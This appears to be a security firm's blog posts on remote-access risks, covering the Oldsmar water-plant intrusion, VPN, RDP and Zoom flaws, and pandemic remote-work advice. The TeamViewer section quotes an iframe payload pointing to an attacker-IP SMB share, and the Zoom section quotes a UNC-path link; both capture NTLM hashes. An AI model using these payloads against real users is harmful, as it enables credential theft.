Thought leadership. Threat analysis. Cybersecurity news and alerts.
Remote Access Security Risks and Best Practices to Counter These Risks
The recent cyber incident in which someone tried to poison the water supply of the city of Oldsmar, Florida highlights the security risks of remote access.
Pinellas County Sheriff Bob Gualtieri, in a press conference held last week, said that someone remotely accessed one of the computers of the city’s water treatment system and increased the amount of sodium hydroxide to a level that could have caused serious harm to the city’s 15,000 residents.
A small concentration of sodium hydroxide is used by the city’s water treatment system to control the water acidity. The high concentration of this chemical, however, causes severe burns and permanent damage to any tissue that it comes in contact with. Gualtieri said that the city’s water supply wasn’t adversely affected as a supervisor, who was also working remotely, noticed the unauthorized change and immediately reverted the chemical concentration to the old level.
Gualtieri told WIRED and Reuters that the threat actor who made the unauthorized change to the concentration of sodium hydroxide gained remote access to the water treatment plant's computer system via TeamViewer – an app that allows a user to gain access to computers and networks remotely. This app is specifically used for desktop sharing.
The security vulnerability, designated as CVE-2020-13699, in TeamViewer for Windows platform was discovered last year by Jeffrey Hofmann, security engineer at Praetorian. Hofmann said the affected versions were versions 8 to 15 of the TeamViewer for Windows platform.
“An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>)that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” Hofmann said. “Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”
An attacker exploiting this vulnerability could force a victim to send an NTLM authentication request and capture the hash for offline password cracking. In response to the disclosure made by Hofmann, TeamViewer issued updates to TeamViewer versions 8 to 15 for the Windows platform. "We implemented some improvements in URI handling relating to CVE 2020-13699,” TeamViewer said in a statement.
It’s unclear whether the updates issued by TeamViewer were applied by the concerned personnel of the city’s water treatment system. According to the Cybersecurity and Infrastructure Security Agency (CISA), early information indicates that it’s possible that TeamViewer may have been used to gain unauthorized access to the water treatment system. This, however, can’t be confirmed at present date, CISA said.
“TeamViewer, a desktop sharing software, is a legitimate popular tool that has been exploited by cyber actors engaged in targeted social engineering attacks, as well as large scale, indiscriminate phishing campaigns,” CISA said. “Desktop sharing software can also be used by employees with vindictive and/or larcenous motivations against employers. Beyond its legitimate uses, when proper security measures aren’t followed, remote access tools may be used to exercise remote control over computer systems and drop files onto victim computers, making it functionally similar to Remote Access Trojans (RATs). TeamViewer’s legitimate use, however, makes anomalous activity less suspicious to end users and system administrators compared to RATs.”
Other Poor Cybersecurity Practices
As a result of the cyber incident at Oldsmar's water treatment system, the State of Massachusetts issued a cybersecurity advisory for public water suppliers. The advisory issued by the State of Massachusetts said, "All computers used by water plant personnel were connected to the SCADA system and used the 32-bit version of the Windows 7 operating system.”
Microsoft ended its support for the Windows 7 operating system on January 14, 2020. End of support, in this case, means end of security updates and technical support. Users of Windows 7 Professional and Enterprise versions, however, can avail of the Extended Security Update (ESU) plan (paid per-device) until January 2023. It isn’t clear whether Oldsmar’s water treatment system availed of the ESU plan.
The cybersecurity advisory further said, “Further, all computers shared the same password for remote access and appeared to be connected directly to the Internet without any type of firewall protection installed.”
Cybersecurity Best Practices
While remote access comes with known risks, remote access has become a necessity as a result of the lockdown restrictions. There’s also an upside with remote access. In the case of the cyber incident at Oldsmar's water treatment system, the unauthorized change was immediately reversed due to remote access as well.
Here are some of the lessons learned out of the cyber incident at Oldsmar's water treatment system:
Shift to Remote Workforce: The Need for Remote IT Support
More than half a year into the pandemic, many have come to accept that office life as we know it is unlikely to come back – at least not for the foreseeable future.
As of September 2020, Statistics Canada reported that a large number of Canadians continued to adapt to COVID-19 by working remotely, with over twice as many people working from home (4.2 million) than those who usually do so (1.9 million). The work from home set-up, however, has opened up cybersecurity challenges that never existed with the office-based workforce, which, in turn, calls for remote IT support.
Cybersecurity Challenges with a Remote Workforce
Here are some of the cybersecurity challenges faced by organizations with remote workforce:
Patching refers to the application of a security update that fixes security vulnerabilities. In the past, when people still used to work in the office, patching is easily done by walking into the office and patch computers that need patching.
With a remote workforce, workers are no longer in the office but working at home. Patching workers’ computers, especially whenthey’re using their personal computers is a challenge.
Timely patching is important as threat actors are quick in exploitingunpatched computers. Microsoft, for instance, recently warned that threat actors are actively attempting to exploit the security vulnerability in Windows Server operating systems designated as CVE-2020-1472 and commonly called “Zerologon”.
Microsoft reported that even as the company had released a patch for Zerologon last August 11th, a surge of Zerologon exploitation has been observed since September 13th, following the publication of several proof-of-concept tools that exploit the Zerologon vulnerability. CVE-2020-1472 is a security vulnerability that essentially turns an attacker into an IT administrator, allowing the attacker to change the computer password of Windows Server operating systems with the Active Directory domain controller role. Active Directory is Microsoft’s proprietary directory service that gives IT administrators the capacity to authenticate computers within a network.
According to Microsoft, prior to exploiting the Zerologon vulnerability, one attacker was observed exploiting the CVE-2019-0604 vulnerability in SharePoint to initially access Windows Server operating systems. Microsoft described this vulnerability as a remote code execution vulnerability that exists in Microsoft SharePoint when the software fails to “check the source markup of an application package”. An attacker who successfully exploits this vulnerability, Microsoft said, could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.
According to the Canadian Centre for Cyber Security, Canadian organizations are being exploited via unpatched devices and inadequate authentication. “In each case, a threat actor was able to compromise infrastructure exposed to the internet because it was not properly secured via 2FA and/or because software running on an exposed server was not patched to the latest version,” the Canadian Centre for Cyber Security said.
The work from home model forces many organizations to allow remote workers to remotely access network resources, opening up a plethora of cybersecurity vulnerabilities.
Remote Desktop Protocol (RDP)
One of the weakest links in allowing remote workers to access corporate networks is by exposing Remote Desktop Protocol (RDP) to the internet. RDP is a proprietary protocol developed by Microsoft that allows a Windows user to connect to Windows workstations or server over the internet.
Kaspersky Lab reported that since the start of the global pandemic in March of this year, brute force attacks against RDP has rocketed across almost the entire planet. Brute force attack uses the trial-and-error method in which an attacker uses as many username and password combinations in the hope of guessing the correct one.
“The lockdown has seen the appearance of a great many computers and servers able to be connected remotely, and right now we are witnessing an increase in cybercriminal activity with a view to exploiting the situation to attack corporate resources that have now been made available (sometimes in a hurry) to remote workers,” Kaspersky Lab said.
“Attackers target RDP servers that use weak passwords and are without multi-factor authentication, virtual private networks (VPNs), and other security protections,” Microsoft said. “Through RDP brute force, threat actor groups can gain access to target machines and conduct many follow-on activities like ransomware and coin mining operations.”
Virtual Private Network (VPN)
The use of Virtual Private Network (VPN) is one of the measures in securing RDP. This too has been the subject of attacks by threat actors.
In August of this year, the Canadian Centre for Cyber Security issued an alert warning organizations of the active exploitation of the vulnerabilities in the VPN products of Fortinet, Palo Alto and Pulse Secure. The software vendors of these VPN products have all issued a corresponding patch prior to the issuance of the security alert of the Canadian Centre for Cyber Security.
Role of Remote IT Support
As the world moves towards a remote workforce, it’s not surprising that IT support is now being done remotely as well.
The recent exploitations of CVE-2020-1472, CVE-2019-0604 and VPN products highlight the importance of timely patching. A remote IT support can assist your organization in patch management, including planning and prioritizing software and firmware updates within a network. If not properly planned, a patch can cause extended downtime, resulting in revenue loss.
A remote IT support can also assist your organization in using network perimeter security devices such as Firewalls and remote access gateways for remote workers and remote IT administrators.
Vulnerable Remote Working Technologies to Watch Out
Mass workforce working remotely has come way too soon as a result of the COVID-19 social distancing restrictions. This sudden shift, however, gives many organizations little time to prepare.
Vulnerable Remote Working Technologies
Below are some vulnerable remote working technologies to watch out as these vulnerabilities could allow cybercriminals to gain a foothold within your organization’s network:
VPN, short for virtual private network, is particularly aimed at remote workers and workers in branch offices to access corporate networks in a secure and private manner.
In 2019, security researchers have found and disclosed several security vulnerabilities in several VPN products. While vendors of these vulnerable VPN products, within a certain period of time, released security updates – also known as patches – fixing these disclosed security vulnerabilities, some users have delayed applying these patches resulting in the active exploitation of the disclosed security vulnerabilities.
Here are examples of VPN security vulnerabilities that have been actively exploited in the wild by cyberattackers:
- CVE-2018-13382: A security vulnerability in Fortinet Fortigate VPN that could allow an unauthenticated user to change the VPN user passwords.
- CVE-2019-1579: A vulnerability in the Palo Alto GlobalProtect VPN that could allow a remote, unauthenticated actor to execute arbitrary code on the VPN server.
- CVE-2019-11510: Multiple security vulnerabilities in the Pulse Connect Secure and Pulse Policy Secure products that could allow a remote, unauthenticated actor to view cached plaintext user passwords and other sensitive information.
- CVE-2019-19781: A security vulnerability in Citrix Gateway virtual private network servers that could allow an attacker to remotely execute code without needing a login.
-VPN 2-Factor Authentication Bypass
Researchers at Fox-IT reported that a threat actor was able to gain VPN access to a victim’s network that was protected by 2-factor authentication (2FA).
“An interesting observation in one of Fox-IT’s incident response cases was that the actor steals a softtoken for RSA SecurID, which is typically generated on a separate device, such as a hardware token or mobile phone,” researchers at Fox-IT said. “In this specific case, however, victims using the software could also use a software-based token to generate 2-factor codes on their laptop. This usage scenario opens up multiple possibilities for an attacker with access to a victim’s laptop to retrieve 2-factor codes used to connect to a VPN server.”
Vulnerable Remote Working Apps
The COVID-19 crisis has turned the video-teleconferencing app a must-have. This technology allows employers and employees in different geographical locations to conduct meetings in real-time by using simultaneous audio and video transmission.
Amidst the COVID-19 crisis, the video-teleconferencing app called “Zoom” has come into the limelight, not just because of the growing number of users but because of the security threats that slowly come to light.
On March 23, 2020, security researcher known only as @_g0dmode on Twitter disclosed a security vulnerability in Zoom’s video-teleconferencing app. "#Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users," @_g0dmode said. Security researcher Matthew Hickey expounded @_g0dmode’s discovery saying that Zoom’s video-teleconferencing app can be used to steal Windows credentials of users.
Vulnerabilities in Remote Desktop Protocol (RDP) – a network communications protocol developed by Microsoft that provides remote access over port 3389 – have recently been disclosed by Microsoft.
-CVE-2019-0708: Dubbed as “Bluekeep”, this vulnerability allows an unauthenticated attacker to connect to the target system using RDP and send specially crafted requests.
- CVE-2020-0609 and CVE-2020-0610: Collectively dubbed as “BlueGate”, this vulnerability similarly allows an unauthenticated attacker to connect to the target system using RDP and sends specially crafted requests.
According to Microsoft, Bluekeep and BlueGate are pre-authentication vulnerabilities and require no user interaction. Microsoft described Bluekeep and BlueGate in the same way: “An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”
Cybersecurity Best Practices
The above-mentioned security vulnerabilities on their own could allow malicious actors to gain access to your organization’s networks, for instance, through ransomware lockdown. Allowing remote workers to access your organization’s networks creates a much larger attack surface for cybercriminals.
Here are some cybersecurity best practices to keep your organization’s networks and your organization’s remote workers safe online:
Keep All Software Up to Date
All the above-mentioned security vulnerabilities have available patches. Apply these patches in a timely manner to keep your organization’s networks and remote workers safe online.
Be Mindful of How Your Organization’s Data Is Handled
In early April of this year, researchers at the University of Toronto reported that Zoom – a Silicon Valley-based company that owns 3 companies in China through which nearly 700 employees are paid to develop the app – used an encryption method that isn’t recommended as “patterns present in the plaintext are preserved during encryption”. The researchers also found that some of Zoom’s video-teleconferencing traffic was being routed through China even though all participants of the video-teleconference were in North America.
Zoom, for its part, said in a statement that the routing of some of Zoom’s video-teleconferencing traffic was a mistake and apologized for the said incident.
How to Facilitate Secure Remote Work Arrangements
The Government of Canada, in an effort to contain and prevent further spread of the new coronavirus disease (COVID-19), has urged all Canadians to stay home and practice social distancing. In the work environment, this means that Canadian businesses are urged to facilitate “remote work arrangements”.
The World Health Organization (WHO) on March 11, 2020 assessed COVID-19 as a pandemic. As of March 21, 2020, the Government of Canada reported 1,231 confirmed cases of COVID-19 in Canada, with 13 deaths. Worldwide, as of March 22, 2020, WHO reported 267,013 confirmed cases of COVID-19 and 11,201 deaths in 185 countries or territories.
“During this extraordinary time, the Government of Canada is taking strong action to help Canadian businesses as COVID-19 is affecting them, their employees and their families,” the Government of Canada said. The Government has urged all Canadians to stay home unless it is absolutely essential to go out, and to practice social distancing and good hygiene. “For businesses, this means facilitating flexible and remote work arrangements,” the Government said.
What Is Remote Work Arrangement?
Remote work arrangement allows workers to work from home whenever and wherever possible. This arrangement limits the number of workers on-site, thereby contributing to the efforts to contain the COVID-19 outbreak and prevent further spread.
Remote work, also known as telework, is nothing new. While remote work has been adopted by some sectors, this hasn’t achieved wide adoption.
Based on the 2016 data from Canada’s General Social Survey (GSS), 2.3 million paid workers or 12.7% of the total workforce of Canada telework at least an hour a week. Out of the 2.3 million Canadians that telework, more than 500,000 workers work for more than 15 hours per week.
According to the 2016 GSS data, remote work in Canada is associated with occupations that are most connected to the knowledge economy, with 36% of workers in the management sector, 24.3% in the education sector and 21.7% in nature and applied science sector telework.
The sudden shift from office work to remote work arrangement as a way to contain and prevent further spread of COVID-19 has caught many employers and employees off guard.
Remote Work Challenges
In a remote work arrangement, there are 2 things that need protection: the devices (those used by the remote workers and those used by remote employers) and the communication link.
One of the challenges of remote work in light of the COVID-19 outbreak is the fact that many organizations are forced to allow their staff to use their personal desktops, laptops or mobile devices as organizations have been unprepared to issue official or organization-owned devices.
Allowing staff to use their personal computers is, in itself, a security issue. Some of the security issues arising from the use of personal computers include:
Organizations offering remote work arrangements are similarly faced with the same device security challenge. Organizations’ devices are at risk of unauthorized access from malicious insiders to malicious outsiders. Outdated computers, such as outdated server operating system, also pose a security threat not just to the organization concerned but also to remote workers allowed to remotely access the organizations’ devices.
Best Practices in Facilitating Secure Remote Work Arrangement
Here are some of the best practices in facilitating secure remote work arrangement:
1. Practice Network Segmentation
Network segmentation refers to the practice of dividing your organization’s network into sub-networks. This practice ensures that in case one sub-network is compromised, the other sub-networks won’t be affected.
For the security of your organization’s network, it’s important to prevent non-IT remote workers from accessing your organization’s network.
For IT remote workers, network segmentation is specifically important. The negligence or malicious actions, for instance, of one remote worker who has access to a certain sub-network, won’t affect the other sub-networks especially those sub-networks that are critical to the operation of your organization.
2. Use VPN
VPN, short for virtual private network, acts as a secure tunnel between two endpoints: the remote worker’s device and your organization’s server. For example, a remote worker can use this VPN to send encrypted data to your organization’s server.
It’s important to use multi-factor authentication for all VPN connections. Multi-factor authentication for all VPN connections is particularly important as login credentials (VPN usernames and passwords) are sought after by cyber criminals. VPN login credentials are often stolen via phishing campaigns – campaigns that trick remote workers to click on malicious links or attachments contained in malicious emails that masquerade as coming from legitimate sources.
Clicking on these malicious links or attachments could lead to the downloading on the remote worker’s device of a malware that steals VPN login details. The use of multi-factor authentication in all VPN connections renders the theft of login details useless.
3. Keep All Devices Up to Date
Always keep your organization’s devices up to date by using devices that receive regular security updates, and by applying security updates in a timely manner. Applying security updates on server operating systems and VPNs should be the top priority.
Vulnerabilities in server operating systems and VPNs have in the past been exploited by malicious actors as these two are seen as gateways to victims’ networks.
On behalf of all staff we wish you and your families well. During these challenging times, we are ready to help those who needs assistance with minimizing IT and cybersecurity risks.
Need a few working remotely tips? Here are a few work from home productivity tips from our management team:
1. Dress for success
Even though you are working from home, always dress as if you were going to work. We found that it helps to set a proper mood and help motivation and demeanor.
2. Find a quite spot
Kids and pets are fun, and you need to be 100% focused on the task at hand to be productive. Every minute of distraction may set you back an hour.
3. Plan your day
Plan as if you were in the office. Keep your calendar up to date and let your co-workers know when you are available and when you are not to avoid scheduling conflicts.
4. Take breaks
Coffee breaks, and lunch are a must to stay rested and sharp. Even when you are working from home, your brain and your eyes still need rest.
5. Don’t check email
Well, most of us must check email, and we recommend checking your email twice a day to get more done. After all, if you are getting back to people the same day, it’s more than acceptable. If something is truly urgent, people will call you.
6. No social media
At least during business hours. Unless browsing social media is a part of your job, keep your mind focused and get more done.
Find the right apps and tools for your particular industry and spend the time automating as many menial tasks as possible. Many tools are free to use or cost very little yet save you a lot of time. If you don’t value your own time, no one else will.
Looking for cybersecurity and IT risk advice? Contact us today to speak with a cybersecurity expert. We offer complimentary advisory services to Canadian businesses of all sizes during the COVID-19 pandemic so that you and your organization remain safe.
Risks & Dangers of Remote Access
Avast and NordVPN, on the same day last October 21st, disclosed a separate and unrelated unauthorized intrusion into their respective networks. While these network intrusions were unrelated, these intrusions were a result of a common cyber security weakness: remote access.
What Is Remote Access?
Remote access allows a user to access a computer or a network, despite the fact that the user has no physical access to said computer or private network. Remote access to a private network can be achieved through virtual private network (VPN) or a remote access feature of an operating system.
An example of a remote access feature of an operating system is the remote desktop protocol (RDP). In Windows operating systems, RDP allows network administrators to manage or troubleshoot computers over the internet.
VPN service providers, meanwhile, promise to offer secure and encrypted connections to its customers. In both VPN and RDP, access to private network is conducted from a remote location using a laptop, desktop computer or mobile device connected to the internet.
Unauthorized Remote Access on Avast Network
Last October 21st, Avast, in a statement, said that on September 23 of this year, it identified suspicious activity on its network. After further analysis, Avast said it found that its internal network was successfully accessed with compromised credentials through a temporary VPN profile that had erroneously been kept enabled and didn’t require 2-factor authentication (2FA).
Avast said that the malicious actor had been attempting to gain access to the company’s network through its VPN as early as May 14 of this year. The company said it closed the temporary VPN profile that was accessed by a malicious actor.
As a precaution, the company suspended the upcoming releases of its product CCleaner and started checking prior CCleaner releases and verified whether malicious alterations had been made. As an added precaution, the company also re-signed a clean update of the product and provided it to users through an automatic update last October 15th.
Avast admitted in September 2017 that its product CCleaner, which it acquired from Piriform on July 18, 2017, had been compromised by malicious actors, resulting in the downloads of 2.27 million of the corrupt CCleaner version by unknowing customers.
Unauthorized Remote Access on NordVPN Network
Last October 21st, virtual private network service provider NordVPN admitted that in March 2018, one of its servers, which the company rented with a third party data center in Finland, was accessed without authority.
NordVPN said that the attacker gained access to the server by exploiting an “insecure” remote management system left by the data center provider. The virtual private network service provider said it had no knowledge the data center provider was using the remote management system.
NordVPN said it immediately terminated the contract with the third party data center and destroyed all servers that the company had been renting from the data center. The virtual private network service provider said that TLS key was taken at the same time the data center was exploited.
The company said that no user credentials have been intercepted. It also said that the TLS key “couldn’t possibly have been used to decrypt the VPN traffic of any other server.” NordVPN said that “the only possible way to abuse website traffic was by performing a personalized and complicated MiTM [man-in-the-middle] attack to intercept a single connection that tried to access nordvpn.com”.
In a man-in-the-middle attack, the attacker intercepts user traffic to steal credentials and other important information. The attacker then uses this stolen information to access the actual destination network. Preventing man-in-the-middle attacks is the reason why people use VPN in the first place.
"Intercepting TLS traffic isn't as hard as they make it seem," security researcher who uses the name “hexdefined”, one of those who analyzed the data exposed in the NordVPN breach, told Ars Technica. "There are tools to do it, and I was able to set up a Web server using their TLS key with two lines of configuration. The attacker would need to be able to intercept the victim's traffic (e.g. on public Wi-Fi)."
Preventive and Mitigating Measures
While remote management systems such as RDP and VPN have a number of benefits, their inherent weakness shouldn’t be ignored, that is, these systems provide a door to your organization’s network to the public internet. These remote management systems or these doors should be closed and opened only to authorized personnel.
One of the preventive measures in protecting these remote management systems from unauthorized entry is through the use of multi-factor authentication or 2-factor authentication. As shown in the case of the Avast data breach, using a VPN account without 2-factor authentication attracts malicious actors.
It’s important to note that there are currently tools to bypass 2-factor authentication or multi-factor authentication. For instance, security researchers at DEVCORE disclosed that they were to access the internal network of Twitter by bypassing the 2-factor authentication for the VPN used by Twitter. While the use of multi-factor authentication or 2-factor authentication isn’t the cure-all in protecting your organization’s network, this security measure decreases a number of attack surfaces.
Network segmentation, the practice of splitting your organization’s network into subnetworks, is another cyber security measures to block malicious actors. This practice ensures that if one network is breached, the others won’t be affected.
It’s also ideal not to install or disable remote management systems on the servers that housed your organization’s critical data in order not to expose this data to the public domain.
Steve E. Driz, I.S.P., ITCP